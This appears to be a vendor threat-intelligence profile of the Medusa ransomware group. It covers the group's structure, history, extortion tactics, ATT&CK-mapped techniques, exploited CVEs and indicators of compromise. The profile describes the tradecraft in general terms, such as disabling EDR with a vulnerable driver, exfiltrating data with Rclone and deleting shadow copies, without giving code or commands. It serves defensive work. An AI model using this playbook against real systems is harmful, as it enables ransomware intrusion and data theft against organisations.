THREAT ACTOR

Medusa

7.7
THREAT LEVEL
EMERGENCE DATE
Jun 2021
CATEGORY
Ransomware-as-a-Service
AFFILIATIONS

Suspected Russian or CIS-nexus operations based on systematic Russia and Commonwealth of Independent States target avoidance, Russian-language forum activity (RAMP), and Cyrillic script in operational tools. Tracked as FROZEN SPIDER by CrowdStrike, Storm-1175 by Microsoft, and Spearwing by Symantec.

DEscription

Emerging in June 2021 as a closed operation before transitioning to RaaS by early 2023, the threat actor achieved Halcyon Frontrunners status and third-place global ranking by Q2 2025. Distinguished by kernel-level EDR disablement using the ABYSSWORKER driver via BYOVD techniques and FBI-documented triple extortion demanding additional payment for the "true decryptor," the operation targets healthcare, education, manufacturing, and government sectors. Operating without law enforcement disruption for over four years, attack volume nearly doubled in early 2025 while zero-day exploitation capabilities and continuous technical advancement position the group among the most persistent threats currently active.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
lethality
Evaluates the potential for damage from the attack, including the ability to disrupt operations, and cause financial loss, damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Ransomware-as-a-Service (RaaS)

Medusa operates through a three-tier structure recruiting Initial Access Brokers via underground forums (RAMP) while affiliates handle deployment and execution receiving substantial ransom portions. Core developers retain control over ransom negotiations despite the affiliate model, maintaining centralized communication and quality consistency while scaling through partnerships. Geographic attribution points to Russian or CIS-nexus operations based on systematic Russia and Commonwealth of Independent States target avoidance, Russian-language forum participation, and Cyrillic script in operational tools.

Current Status: Actively operational with operations through October 2025

Threat Level:
7.7

Origins and Methodology

What sets the group apart is kernel-level security tool disablement via the ABYSSWORKER driver (smuol.sys) to disable Sophos, CrowdStrike Falcon, Microsoft Defender, and SentinelOne through BYOVD attacks. The driver mimics legitimate CrowdStrike naming while removing registered notification callbacks, delivered via HeartCrypt Packer-as-a-Service with stolen Chinese vendor certificates.

An unusual clear web presence runs through OSINT Without Borders identity with active Telegram, X/Twitter, and Facebook profiles using pseudonyms, contrasting with typical dark web-only operations.

What is the Evolution of Medusa Ransomware?
0.1
Formation

First identified in June 2021 as a closed ransomware variant with all development and operations controlled by a single group. The operation kept this exclusive structure through late 2022, focusing on technical development before transitioning to affiliate recruitment.

0.2
EVOLUTION

Initial months following emergence saw limited activity with the group working exclusively through core developers. Around late 2022, the operation began public emergence with increased visibility in the cybercrime ecosystem and presence on Russian-language forums.

February 2023 marked expansion with the Medusa Blog leak site launch on Tor and Telegram channel activation. Technical capabilities evolved with version progression from v1.10 to v1.20.

Current operations since 2024 show significant attack increase, with strategic positioning following LockBit and ALPHV/BlackCat disruptions. Q1 2025 brought accelerated activity, nearly doubling the 2024 rate. Capabilities continue evolving with zero-day exploitation, triple extortion, and custom ESXi payload development.

0.3
Lineage/Connections

The operation runs as an independent ransomware family with no code similarities to other RaaS variants. FBI investigation confirms complete distinction from MedusaLocker ransomware (emerged 2019), with no connection to Medusa Android Banking Trojan or Medusa Botnet.

Intelligence sources link operations to FROZEN SPIDER, an eCrime group drawing on the ransomware for big game hunting. The exact organizational relationship remains unclear, though CrowdStrike confirms specialized roles including initial access specialists, penetration testers, media operations, negotiators, and technical operations teams.

Which Unique Techniques Does Medusa Use?

Attack methodology centers on exploiting internet-facing vulnerabilities and tapping into legitimate administrative tools for reconnaissance before deploying double extortion. Worth noting, rapid dwell time from initial access to deployment allows for quick operational execution.

TECHNIQUE

DETAILS

Infection Vectors

CVE-2024-1709 (ConnectWise ScreenConnect authentication bypass, CVSS 10.0), CVE-2023-48788 (Fortinet EMS SQL injection, CVSS 9.8), CVE-2025-10035 (GoAnywhere MFT zero-day, CVSS 10.0), and ProxyShell exploitation; IAB recruitment via underground forums; phishing campaigns for credential theft; RDP brute-force

Target Selection

Organizations with unpatched public-facing applications; inadequate MFA and network segmentation; critical infrastructure with low downtime tolerance; worldwide operations with primary focus on the United States, United Kingdom, Canada, Australia, Germany

Operational Complexity

Three-tier model: core developers (Tier 1) controlling ransomware development and centralized negotiation; affiliates (Tier 2) handling deployment; IABs (Tier 3) specializing in initial access; professional 24/7 negotiation team; automated deployment via enterprise tools

Key Features & Technical Details

The ransomware uses hybrid cryptographic architecture combining AES-256 symmetric encryption with RSA-2048/4096 asymmetric key management, rendering encrypted data unrecoverable without attacker-held private keys.

FEATURE

DETAILS

Encryption Method

Hybrid AES-256 (CBC mode) with RSA-2048/4096 public key encryption; Windows BCryptEncrypt API family implementation; file structure appends encrypted content + "MEDUSA" marker + file length + RSA-encrypted key + 32-byte company ID hash; excludes .dll, .exe, .lnk files and system directories to keep victim systems functional

File Extension

.medusa (all capitals) appended to encrypted files

Ransom Note

!!!READ_ME_MEDUSA!!!.txt with 48-hour response deadline via Tor browser live chat or Tox encrypted messaging; direct phone/email contact if victim fails to respond

Double Extortion

Rclone primary exfiltration tool to C2 servers; documented volumes vary significantly per victim; Medusa Blog Tor-based leak site with countdown timers, sample data publication, visitor counts; data offered for sale to third parties; triple extortion: post-payment separate actor contact claiming negotiator "stolen" payment, demanding additional payment for "true decryptor"

Communication Channels

Primary C2: Tor .onion domains; HTTPS port 443 for command and control; Ligolo reverse tunneling, Cloudflared for infrastructure obfuscation; clear web presence via OSINT Without Borders on Telegram, X/Twitter, Facebook

Deployment Speed

Rapid average from initial access to deployment; automated toolsets; preconfigured attack playbooks; extensive Windows services terminated; shadow copy deletion, startup recovery disabling, local backup removal

Payment Method

Bitcoin (BTC) primary cryptocurrency with direct wallet hyperlinks on leak site; countdown extension fees; negotiation via Tor live chat, Tox messaging, ProtonMail/Onionmail/Cock.li email; cryptocurrency mixing through Monero, Zcash, dark web exchangers

Operational Model

Hybrid RaaS with centralized negotiation: core developers retain negotiation control; affiliates receive substantial ransom portions; IABs compensated for exclusive access

Activities

Operating since June 2021, the threat actor shows consistent year-round activity with February 2025 marking the most active month. Attack volume nearly doubled in early 2025 versus 2024, with significant increase between 2023 and 2024 overall.

Geographic reach spans multiple countries worldwide. The United States accounts for over half of attacks, while the United Kingdom shows outsized presence. Russia and Commonwealth of Independent States countries are systematically avoided.

Which Industries Are Most Vulnerable to Medusa?

Target sectors prioritize healthcare, education, manufacturing, legal services, technology, insurance, and government operations.

HAL Most Recent Attacks

Modus Operandi

Multi-stage attacks draw on vulnerability exploitation and legitimate administrative tools before deploying double extortion.

Details

IAB recruitment via Exploit Public-Facing Application (T1190) exploiting CVE-2024-1709 (ConnectWise ScreenConnect authentication bypass, CVSS 10.0), CVE-2023-48788 (Fortinet FortiClient EMS SQL injection, CVSS 9.8), CVE-2025-10035 (GoAnywhere MFT deserialization, CVSS 10.0) exploited as zero-day, and ProxyShell vulnerabilities (Microsoft Exchange Server).

Phishing campaigns (T1566) for credential theft; RDP brute-force when vulnerabilities unavailable; VPN concentrator exploitation; compensation for exclusive network access (TA0001).

Details

Advanced IP Scanner and SoftPerfect Network Scanner for user, system, and network enumeration via Network Service Discovery (T1046) scanning ports 21 (FTP), 22 (SSH), 23 (Telnet), 80 (HTTP), 115 (SFTP), 443 (HTTPS), 1433 (SQL), 3050 (Firebird), 3128 (HTTP proxy), 3306 (MySQL), 3389 (RDP). PowerShell (T1059.001) and Windows Command Prompt (T1059.003) for network and filesystem enumeration (T1083).

Windows Management Instrumentation (T1047) for System Information Discovery (T1082). Network Share Discovery (T1135) querying shared drives, System Network Configuration Discovery (T1016), Permission Groups Discovery for Domain Groups (T1069.002).

Details

Variety of legitimate remote access software (T1219) tailored to any tools already present in victim environment: AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, Splashtop, MeshAgent. Tools work with RDP (T1021.001) and PsExec (T1569.002) for lateral movement.

Details

Living-off-the-Land techniques (TA0005) tapping into legitimate system tools.

Certutil for file ingress via Ingress Tool Transfer (T1105). PowerShell evasion: base64 encrypted commands (T1027.013), string obfuscation (T1027), gzip compression with base64 encoding, powerfun.ps1 stager script for TLS-encrypted shells on port 443. PowerShell history deletion (T1070.003). BYOVD attack via Impair Defenses (T1562.001) working with ABYSSWORKER driver (smuol.sys), delivered via HeartCrypt Packer-as-a-Service, signed with stolen certificates, going after major EDR solutions.

Multi-stage obfuscation: VMProtect packing, ASM Guard loader, Safengine Shielden. Code Signing (T1553.006) with revoked certificates. XOR string encryption. Indicator Removal (T1070) deleting tools post-encryption.

Details

Mimikatz for LSASS Memory dumping (T1003.001) to harvest credentials (TA0006) accessing credential material in process memory or Local Security Authority Subsystem Service.

Details

Application Layer Protocol via Web Protocols (T1071.001) working with HTTPS port 443 for C2 and TLS-encrypted shells. Ingress Tool Transfer (T1105) drawing on PowerShell, Windows Command Prompt, and certutil.

Remote Access Software (T1219) including AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, SimpleHelp, Splashtop, MeshAgent. Ligolo reverse tunneling creating secure connections between compromised host and threat actor machine. Cloudflared (formerly ArgoTunnel) exposing applications to internet via Cloudflare Tunnel.

Details

Lateral Movement (TA0008) via RDP (T1021.001) for interactive sessions; PsExec (T1569.002) copying scripts to remote machines executing with SYSTEM privileges; Software Deployment Tools (T1072) including PDQ Deploy and BigFix to deploy encryptor gaze.exe across networks.

Registry modification enabling RDP and creating firewall rules allowing inbound TCP traffic port 3389 and remote WMI connections.

Details

Exfiltration (TA0010) via Rclone primary tool for Exfiltration to Cloud Storage (T1567.002) to C2 servers. Documented volumes: 200GB-2.3TB+ per victim going after patient medical records, student information, attorney-client communications, financial records, intellectual property, government data, employee information.

Details

Create Account for Domain Accounts (T1136.002) creating domain accounts, adding accounts to privileged groups including Domain Admins, Enterprise Admins, Remote Desktop Users, Group Policy Creator Owners, Schema Admins. Remote Access Software (T1219) for persistent access.

Details

Service Stop (T1489) via gaze.exe terminating 100-200+ services. Inhibit System Recovery (T1490) deleting shadow copies, disabling startup recovery, removing local backups. Data Encrypted for Impact (T1486) interrupting availability. System Shutdown/Reboot (T1529) manual VM termination. Financial Theft (T1657) with estimated 25% payment rates, generating $40+ million in 2024 ransom demands.

Details

Sysinternals PsExec, PDQ Deploy, or BigFix (T1072) deploying encryptor gaze.exe across networks with Windows Defender disablement. Data Encrypted for Impact (T1486) via gaze.exe process terminating services (T1489) related to backups, security, databases, communication (100-200+ Windows services), then deleting shadow copies via Inhibit System Recovery (T1490), and encrypting files with AES-256.

Encrypted files receive .medusa extension. System Shutdown/Reboot (T1529) manually turning off and encrypting virtual machines. 11 command-line arguments supported for deployment options.

Details

Financial Theft (T1657) via ransom demands $100,000 to $15 million USD in Bitcoin. Ransom note demands contact within 48 hours via Tor browser live chat or Tox encrypted messaging. Direct phone or email outreach if victim fails to respond.

Medusa Blog .onion leak site with countdowns to information release, ransom demands posted with direct cryptocurrency wallet hyperlinks, concurrent data sale to third parties. Victims can pay $10,000 USD to add 24 hours to countdown. Triple extortion: after paying ransom, one victim contacted by separate actor claiming negotiator "stolen" ransom, requesting half payment again for "true decryptor."

Details

Indicator Removal (T1070) deleting previously installed tools including remote access software, reconnaissance tools, credential dumping utilities, and exfiltration tools. Clear Command History (T1070.003) via PowerShell history deletion.

Indicators of Compromise (IOCs)

The following indicators derive from FBI, CISA, MS-ISAC investigations and security vendor threat intelligence.

INDICATOR

DETAILS

File Hashes

MD5: 44370f5c977e415981febf7dbb87a85c (openrdp.bat enabling incoming RDP/remote WMI)
MD5: 80d852cd199ac923205b61658a9ec5bc (pu.exe reverse shell)
SHA-256: 4d4df87cf8d8551d836f67fbde4337863bac3ff6b5cb324675054ea023b12ab6 (v1.20)
SHA-256: 736de79e0a2d08156bae608b2a3e63336829d59d38d61907642149a566ebd270 (v1.10)

IP Addresses

195.123.246.138 (C2 server)
138.124.186.221 (C2 server)
159.223.0.9 (C2 server)
45.146.164.141 (C2 server)
185.220.101.35 (Tor exit node)
137.184.243.69 (executable delivery)
31.220.45.120 (SimpleHelp infrastructure)

Domains/URLs

medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd[.]onion (Medusa Blog leak site)
medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd[.]onion (backup leak site)
key.medusa.serviceteam@protonmail.com (ransom negotiation)
medusa.support@onionmail.org (ransom negotiation)
MedusaSupport@cock.li (ransom negotiation)

File Paths

csidl_windows\adminarsenal\pdqdeployrunner\service-1\exec\gaze.exe (PDQ Deploy characteristic path)
C:\Windows\Temp\ (staging directory)
!!!READ_ME_MEDUSA!!!.txt (ransom note)

File Extensions

.medusa (encrypted file extension, all capitals)

Exploits and Vulnerabilities

EXPLOITS AND VULNERABILITIES

CVE

CVSS

DESCRIPTION

ConnectWise ScreenConnect Authentication Bypass

CVE-2024-1709

10.0

Authentication bypass via alternate path enabling unauthenticated setup wizard access for admin account creation and remote code execution; primary initial access vector in 2024-2025 campaigns

Fortinet FortiClient EMS SQL Injection

CVE-2023-48788

9.8

SQL injection vulnerability enabling unauthorized code execution via specially crafted requests

GoAnywhere MFT Deserialization

CVE-2025-10035

10.0

Zero-day deserialization vulnerability exploited by Storm-1175 operators before vendor disclosure; added to CISA KEV catalog September 2025

Additional Attack Vectors: ProxyShell vulnerabilities (Microsoft Exchange Server CVEs) exploited for initial access; RDP brute-force attacks targeting exposed Remote Desktop services; VPN concentrator exploitation; phishing campaigns with credential theft